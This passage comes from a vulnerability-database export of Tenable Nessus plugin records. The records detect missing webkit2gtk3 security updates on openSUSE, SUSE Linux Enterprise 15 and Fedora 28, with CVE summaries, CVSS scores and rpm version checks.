value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libjavascriptcoregtk-4_0-18-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libwebkit2gtk-4_0-37-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libwebkit2gtk3-lang-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"typelib-1_0-WebKit2-4_0-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit-jsc-4-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit-jsc-4-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk-4_0-injected-bundles-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-debugsource-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-devel-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-plugin-process-gtk2-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-plugin-process-gtk2-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4_0-18 / libjavascriptcoregtk-4_0-18-debuginfo / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-14T06:13:38", "description": "This update for webkit2gtk3 to version 2.20.3 fixes the following\nissues: These security issues were fixed :\n\n - CVE-2018-4190: An unspecified issue allowed remote\n attackers to obtain sensitive credential information\n that is transmitted during a CSS mask-image fetch\n (bsc#1097693).\n\n - CVE-2018-4199: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (buffer overflow and application crash) via a\n crafted website (bsc#1097693)\n\n - CVE-2018-4218: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website that triggers an @generatorState\n use-after-free (bsc#1097693)\n\n - CVE-2018-4222: An unspecified issue allowed remote\n attackers to execute arbitrary code via a crafted\n website that leverages a getWasmBufferFromValue\n out-of-bounds read during WebAssembly compilation\n (bsc#1097693)\n\n - CVE-2018-4232: An unspecified issue allowed remote\n attackers to overwrite cookies via a crafted website\n (bsc#1097693)\n\n - CVE-2018-4233: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1097693)\n\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL\n and webkitFaviconDatabaseSetIconURLForPageURL mishandle\n an unset pageURL, leading to an application crash\n (bsc#1095611).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 20, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-01-02T00:00:00", "title": "SUSE SLED15 / SLES15 Security Update : webkit2gtk3 (SUSE-SU-2018:2075-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4199", "CVE-2018-4190", "CVE-2018-11646", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4218", "CVE-2018-4232"], "modified": "2019-01-02T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore", "p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo", "cpe:/o:novell:suse_linux:15", "p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0", "p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:suse_linux:webkit2gtk3-devel", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource", "p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2WebExtension", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo"], "id": "SUSE_SU-2018-2075-1.NASL", "href": "https://www.tenable.com/plugins/nessus/120064", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:2075-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(120064);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/13\");\n\n script_cve_id(\"CVE-2018-11646\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4218\", \"CVE-2018-4222\", \"CVE-2018-4232\", \"CVE-2018-4233\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : webkit2gtk3 (SUSE-SU-2018:2075-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for webkit2gtk3 to version 2.20.3 fixes the following\nissues: These security issues were fixed :\n\n - CVE-2018-4190: An unspecified issue allowed remote\n attackers to obtain sensitive credential information\n that is transmitted during a CSS mask-image fetch\n (bsc#1097693).\n\n - CVE-2018-4199: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (buffer overflow and application crash) via a\n crafted website (bsc#1097693)\n\n - CVE-2018-4218: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website that triggers an @generatorState\n use-after-free (bsc#1097693)\n\n - CVE-2018-4222: An unspecified issue allowed remote\n attackers to execute arbitrary code via a crafted\n website that leverages a getWasmBufferFromValue\n out-of-bounds read during WebAssembly compilation\n (bsc#1097693)\n\n - CVE-2018-4232: An unspecified issue allowed remote\n attackers to overwrite cookies via a crafted website\n (bsc#1097693)\n\n - CVE-2018-4233: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1097693)\n\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL\n and webkitFaviconDatabaseSetIconURLForPageURL mishandle\n an unset pageURL, leading to an application crash\n (bsc#1095611).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1095611\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1097693\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-11646/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4190/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4199/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4218/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4222/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4232/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4233/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20182075-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6fc09758\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Desktop Applications 15:zypper in -t\npatch SUSE-SLE-Module-Desktop-Applications-15-2018-1401=1\n\nSUSE Linux Enterprise Module for Basesystem 15:zypper in -t patch\nSUSE-SLE-Module-Basesystem-15-2018-1401=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2WebExtension\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libjavascriptcoregtk-4_0-18-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libwebkit2gtk-4_0-37-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"typelib-1_0-WebKit2-4_0-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit2gtk-4_0-injected-bundles-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit2gtk3-debugsource-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit2gtk3-devel-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libjavascriptcoregtk-4_0-18-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libwebkit2gtk-4_0-37-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"typelib-1_0-WebKit2-4_0-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit2gtk-4_0-injected-bundles-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit2gtk3-debugsource-2.20.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit2gtk3-devel-2.20.3-3.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkit2gtk3\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:16:04", "description": "This update addresses the following vulnerabilities :\n\n -\n [CVE-2018-4190](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4190),\n [CVE-2018-4199](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4199),\n [CVE-2018-4218](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4218),\n [CVE-2018-4222](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4222),\n [CVE-2018-4232](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4232),\n [CVE-2018-4233](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4233),\n [CVE-2018-4246](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4246),\n [CVE-2018-11646](https://cve.mitre.org/cgi-bin/cvename.c\n gi?name=CVE-2018-11646).\n\nAdditional fixes :\n\n - Fix installation directory of API documentation.\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Properly detect compiler flags, needed libs, and\n fallbacks for usage of 64-bit atomic operations.\n\n - Fix a network process crash when trying to get cookies\n of about:blank page.\n\n - Fix UI process crash when closing the window under\n Wayland.\n\n - Fix several crashes and rendering issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 14, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-01-03T00:00:00", "title": "Fedora 28 : webkit2gtk3 (2018-118b9abf99)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4199", "CVE-2018-4190", "CVE-2018-11646", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4232"], "modified": "2019-01-03T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:webkit2gtk3", "cpe:/o:fedoraproject:fedora:28"], "id": "FEDORA_2018-118B9ABF99.NASL", "href": "https://www.tenable.com/plugins/nessus/120240", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-118b9abf99.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120240);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-11646\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4218\", \"CVE-2018-4222\", \"CVE-2018-4232\", \"CVE-2018-4233\", \"CVE-2018-4246\");\n script_xref(name:\"FEDORA\", value:\"2018-118b9abf99\");\n\n script_name(english:\"Fedora 28 : webkit2gtk3 (2018-118b9abf99)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update addresses the following vulnerabilities :\n\n -\n [CVE-2018-4190](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4190),\n [CVE-2018-4199](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4199),\n [CVE-2018-4218](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4218),\n [CVE-2018-4222](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4222),\n [CVE-2018-4232](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4232),\n [CVE-2018-4233](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4233),\n [CVE-2018-4246](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4246),\n [CVE-2018-11646](https://cve.mitre.org/cgi-bin/cvename.c\n gi?name=CVE-2018-11646).\n\nAdditional fixes :\n\n - Fix installation directory of API documentation.\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Properly detect compiler flags, needed libs, and\n fallbacks for usage of 64-bit atomic operations.\n\n - Fix a network process crash when trying to get cookies\n of about:blank page.\n\n - Fix UI process crash when closing the window under\n Wayland.\n\n - Fix several crashes and rendering issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-118b9abf99\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkit2gtk3 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:webkit2gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"webkit2gtk3-2.20.3-1.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkit2gtk3\");\n}\n", "cvss": {"score": 6.8, "vector": 